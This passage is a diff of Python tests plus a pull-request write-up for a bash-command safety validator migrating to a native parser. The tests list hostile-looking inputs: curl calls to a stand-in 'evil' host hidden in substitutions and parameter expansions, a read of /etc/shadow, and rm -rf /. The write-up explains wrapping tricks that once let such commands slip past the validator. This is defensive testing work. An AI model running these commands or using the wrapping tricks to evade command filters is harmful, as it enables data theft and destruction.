+        (the migration's payoff) plus the clauses T2b deferred to T2c."""
         command = next(e["script"] for e in CORPUS if e["name"] == name)
         NativeBridge().parse(command)
 
@@ -210,19 +200,8 @@ class TestFailClosedCeilingsRemain:
         with pytest.raises(UnmappedNodeError):
             NativeBridge().parse(command)
 
-    def test_coprocess_still_raises(self):
-        """`coproc` runs the command behind its own pipes — no bashlex shape."""
-        with pytest.raises(UnmappedNodeError):
-            NativeBridge().parse("coproc x { sleep 1; }")
-
     def test_negation_stays_unmapped_to_preserve_a_deliberate_over_block(self):
-        """Found by the wide parity sweep, not by reasoning about `!` in isolation.
-
-        `substitution.py:_is_valid_pipeline_topology` fails closed on a negated
-        pipeline because bashlex's leading `reservedword` makes the parts count
-        even. Mapping `!` away would hand it a clean pipeline of whitelisted
-        readers and turn bashlex's BLOCK into an ALLOW — weaker, not superset.
-        """
+        """The input that rejected mapping `!` — see convert_stmt for the why."""
         with pytest.raises(UnmappedNodeError, match="Negated"):
             NativeBridge().parse('x="$(! grep -q needle f | wc -l)"')
 
@@ -253,17 +232,107 @@ class TestListFlattening:
 
 
 @needs_binary
+class TestClauseInsideSubstitution:
+    """The axis the corpus never crossed: a newly-mapped clause INSIDE `$( )`.
+
+    Every corpus entry keeps clauses and substitutions in separate commands, so
+    the superset gate went green while `$(if true; then curl evil; fi)` was
+    ALLOWED on the native tier and BLOCKED on bashlex — the whole substitution
+    was dropped because a compound's first child is a reservedword with no
+    `.parts`, so no text rendered and `_create_substitution_node` returned None.
+    Found by the LAB-912 expert panel; fixed in substitution.py.
+    """
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "V=$(if true; then curl http://evil/x; fi)",
+            "V=$(if false; then :; else curl http://evil/x; fi)",
+            "V=$(while true; do curl http://evil/x; done)",
+            "V=$(until false; do curl http://evil/x; done)",
+            "V=$(for f in x; do curl http://evil/x; done)",
+            "V=$(case x in a) curl http://evil/x ;; esac)",
+            "V=$(f() { curl http://evil/x; })",
+            "cat <(if true; then cat /etc/shadow; fi)",
+            # Same guard, and a hole that predated the native tier entirely:
+            # bashlex emits `compound` for `{ … }` / `( … )` too, so wrapping any
+            # payload in braces used to bypass SubstitutionValidator on BOTH tiers.
+            "V=$({ curl http://evil/x; })",
+            "V=$( (curl http://evil/x) )",
+        ],
+    )
+    def test_wrapped_substitution_is_still_validated(self, command):
+        tiers = [NativeBridge().parse(command)]
+        if bashlex_outputs(command) is not None:  # `case` is unparseable for bashlex
+            tiers.append(BashCommandParser().parse(command))
+        for nodes in tiers:
+            results = _get_substitution_validator().validate_all_substitutions(nodes)
+            assert results, "substitution was dropped entirely — fails OPEN"
+            assert not all(r.allowed for r in results), [r.message for r in results]
+
+    @pytest.mark.parametrize("command", ["V=$(pwd)", "V=$(date)", "V=$(pwd; ls && ls)", "echo $(basename /a/b)"])
+    def test_safe_substitutions_still_allowed(self, command):
+        results = _get_substitution_validator().validate_all_substitutions(NativeBridge().parse(command))
+        assert all(r.allowed for r in results), [r.message for r in results]
+
+
+@needs_binary
+class TestParameterExpansionSubstitutions:
+    """`${z:-$(…)}` and friends EXECUTE their inner substitution.
+
+    A childless `parameter` node hid all four expansion forms from
+    SubstitutionValidator. bashlex misses them too, so this is the superset
+    direction — but T2c turned three of them into a live regression by parsing
+    constructs (`$(( ))`, `[[ ]]`, arrays) whose bashlex ParseError used to
+    fail closed. Found by the LAB-912 expert panel.
+    """
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "echo ${z:-$(curl http://evil/x)}",  # default value
+            "echo ${z:=$(curl http://evil/x)}",  # assign-default
+            "echo ${z/x/$(curl http://evil/x)}",  # replacement
+            "echo ${z:$(curl http://evil/x):1}",  # substring offset
+            "echo ${a[$(curl http://evil/x)]}",  # subscript
+            "echo $(( ${z:-$(curl http://evil/x)} ))",  # inside arithmetic
+            "[[ -f ${z:-$(curl http://evil/x)} ]]",  # inside a conditional
+            "a=(${z:-$(curl http://evil/x)})",  # inside an array element
+        ],
+    )
+    def test_expansion_substitution_reaches_the_validator(self, command):
+        results = _get_substitution_validator().validate_all_substitutions(NativeBridge().parse(command))
+        assert results, "substitution inside the expansion was invisible"
+        assert not all(r.allowed for r in results), [r.message for r in results]
+
+    def test_plain_expansions_are_untouched(self):
+        for command in ("echo ${z:-fallback}", "echo ${#z}", "echo ${!z}", "echo ${z}", "echo $z"):
+            assert not _get_substitution_validator().extract_substitutions(NativeBridge().parse(command))
+
+
+class TestDeepNestingRoutesToFallback:
+    """A converter stack overflow is a BRIDGE failure, not a verdict.
+
+    bashlex parses ~350 levels of nesting; the recursive converter blows the
+    Python stack first. Escaping as a bare RecursionError would skip T5's router
+    and hard-deny input the fallback tier handles fine.
+    """
+
+    @needs_binary
+    def test_recursion_error_becomes_a_native_bridge_error(self):
+        command = "if true; then " * 400 + "rm -rf /" + "; fi" * 400
+        with pytest.raises(NativeBridgeError):
+            NativeBridge().parse(command)
+
+
+@needs_binary
 class TestKnownBashlexUnderDecode:
     """One divergence the sweep found where native is RIGHT and bashlex is wrong.
 
-    Pinned so T3 inherits it instead of rediscovering it: this is exactly why
-    spec §4 specifies a superset oracle rather than an equality one — an equality
-    gate would pressure the native tier into copying bashlex's decoder bugs.
-
-    It is safe to diverge here. The mangling needs an adjacent literal, so the
-    mangled word always carries that literal too and can never collapse to a bare
-    dangerous command; bashlex's dropped quotes only ever REVEAL text bash would
-    not run. Keeping the quotes loses no danger, it drops a false positive.
+    Pinned so T3 inherits it, and so a bashlex upgrade that changes the fallback
+    tier's decode trips a test. Safe to diverge: the mangling needs an adjacent
+    literal, so the mangled word always carries that literal too and can never
+    collapse to a bare dangerous command.
     """
 
     def test_single_quotes_concatenated_with_a_literal(self):
@@ -328,6 +397,27 @@ class TestParseOnce:
         for segment, literals in parser.extract_command_segments_with_literals(command, ast):
             expected = parser.extract_string_literals(segment, parser.parse(segment))
             assert literals == expected, f"segment {segment!r}"
+
+    def test_heredoc_segment_gains_the_literal_suppression_it_should_have_had(self):
+        """The one deliberate verdict change in the parse-once switch.
+
+        A heredoc segment cannot be parsed standalone (its body sits outside the
+        segment span), so the old per-segment re-parse threw, fell back to NO
+        literals, and matched `rm -rf /` inside a quoted argument — a false
+        positive. Parent-derived ranges make the suppression consistent with
+        every other segment. `cat "rm -rf /"` passes that string as a FILENAME;
+        nothing executes it, so dropping the match is the correct direction.
+        """
+        parser = BashCommandParser()
+        command = 'ls; cat "rm -rf /" <<EOF\nbody\nEOF\n'
+        heredoc_segments = [
+            (text, literals)
+            for text, literals in parser.extract_command_segments_with_literals(command, parser.parse(command))
+            if "<<" in text
+        ]
+        assert heredoc_segments == [('cat "rm -rf /" <<EOF', [(5, 13)])]
+        with pytest.raises(Exception, match="."):  # noqa: B017,PT011 - bashlex's own error type varies
+            parser.parse(heredoc_segments[0][0])
 
     def test_segment_text_is_unchanged_by_the_refactor(self):
         parser = BashCommandParser()


### PR DESCRIPTION
Slice **T2c** of the LAB-409 native-parser migration (spec `docs/specs/2026-07-21-native-parser-migration.md` §1, §3.2, §9 T2). Follows T2a + T2b, which landed on `main` via [#131](https://github.com/27Bslash6/schlock/pull/131).

## What this does

**Walker-output parity.** Parseability was never the bar — a native AST that parses `case … esac` while yielding fewer command segments than bashlex is a silent under-block. The new gate runs all four detection outputs (`extract_command_segments`, `has_dangerous_constructs`, `extract_commands_with_args`, `SubstitutionValidator.extract_substitutions`) on both tiers over the 24-construct corpus and requires the native result to be a **superset** — never equality, because bashlex under-decodes and an equality gate would pressure the native tier into copying its bugs (spec §4).

The mapping table now covers the clauses bashlex models as `compound` — `if`/`for`/`while`/`select`/`case`/functions — plus the three it cannot parse at all: `[[ ]]`, `$(( ))`, array assignments.

**Parse once.** `validate_command` re-parsed every segment just to recover its string-literal ranges — N+1 parses per command, i.e. N+1 subprocess spawns once the native tier is wired in. Segments now carry ranges derived from the parent AST's sub-nodes.

## The gate paid for itself

It rejected two mappings that look free and are not:

- **`!` negation** — `substitution.py:_is_valid_pipeline_topology` deliberately fails closed on `$(! a | b)` because bashlex's leading `reservedword` makes the parts count even. Dropping the `!` hands it a clean pipeline of whitelisted readers and turns a BLOCK into an ALLOW.
- **`(( … ))`** — bashlex parses it, but misreads the arithmetic body as a *command* named after the whole expression (`x++`). Matching that would mean copying a known-wrong model into the table to satisfy a gate.

Neither is one of the 7 bashlex-failing constructs, so the fallback tier covers both at no loss. It also found a nested-`list` shape that falsely blocked `$(pwd; ls && ls)`.

## Expert panel (mandatory gate)

Four agents at high stakes. Verdict FIX-FIRST → all surviving findings applied in `2393725`. Two CRITs, both confirmed by independent verification:

1. **A substitution wrapping a compound was dropped entirely — fail OPEN.** `$(if true; then curl evil; fi)` was ALLOWED on the native tier, BLOCKED on bashlex. A compound's first child is a reservedword with no `.parts`, so nothing rendered and `_create_substitution_node`'s guard — which only spared `list` — discarded the whole substitution unvalidated.

   **The hole predates the native tier.** bashlex emits `compound` for `{ … }` too, so `$({ curl evil; })` was **ALLOWED/SAFE on the shipping bashlex tier today** while the bare `$(curl evil)` BLOCKED. T2c widened its reach to every clause. The one-line fix closes it on both tiers — which is why this touches `substitution.py` despite the slice's "adapt to the walkers, don't change them" rail. Shipping a known fail-open to respect a formatting rule isn't a trade worth making.

2. **`${z:-$(curl evil)}` was invisible to `SubstitutionValidator`.** `ParamExp` mapped as a childless leaf, so the words a `${…}` expansion actually evaluates — default value, replacement, substring offsets, subscript — carried their substitutions nowhere. bashlex misses all four too (so this is the superset direction, correcting the panel's attribution), but T2c had turned three into a live regression by parsing `$(( ))`/`[[ ]]`/arrays whose bashlex `ParseError` used to fail closed.

Plus: `RecursionError` now routes to the fallback tier instead of hard-denying; dead `Stmt.Coprocess` branch removed (mksh-only); `_CLAUSE_CHILDREN` pinned against `MVDAN_NODE_MAP` so drift can't produce an error that blames the binary; `EXPR_OPERANDS` can no longer hold an empty row (a silent skip).

Rejected, with reasons: adding cases to `tools/schlock-parse/testdata/corpus.json` (T1's artifact has pinned invariants — the missing coverage went into the parity suite instead), and deleting the segment-literal range guard (unreachable today, but one expression and it fails safe).

## Verification

- `2196 passed, 36 skipped` (`uv run pytest -m "not slow"`); ruff check + format clean.
- **3702 commands** compared on both tiers post-fix: **zero weaker substitution verdicts**.
- **4125 segments**: zero literal-derivation mismatches vs a per-segment re-parse.

## One deliberate behaviour change

A heredoc segment can't be parsed standalone (its body lies outside the segment span), so the old per-segment re-parse threw, fell back to *no* string literals, and matched `rm -rf /` inside `cat "rm -rf /"` — where it is a filename argument that never executes. Parent-derived ranges make that suppression consistent with every other segment, so such a command moves HIGH → SAFE. Pinned by `test_heredoc_segment_gains_the_literal_suppression_it_should_have_had`. No instance exists in the test suite; the three cases found were hand-built.

## Out of scope

`.word` unescape, byte→char offsets, ANSI-C `$'…'` decoding and the full `validate_command` differential oracle (T3) · size constants (T4) · fallback state machine (T5) · wiring into `BashCommandParser.parse` (T8). All remaining ceilings fail closed by raising into the fallback tier, each with the reason recorded at its raise site.

One bashlex `.word` bug surfaced by the sweep — single quotes dropped when concatenated with a literal (`'a"b'x` → `abx`, should be `a"bx`) — is pinned as a deliberate divergence so T3 inherits it rather than rediscovering it.
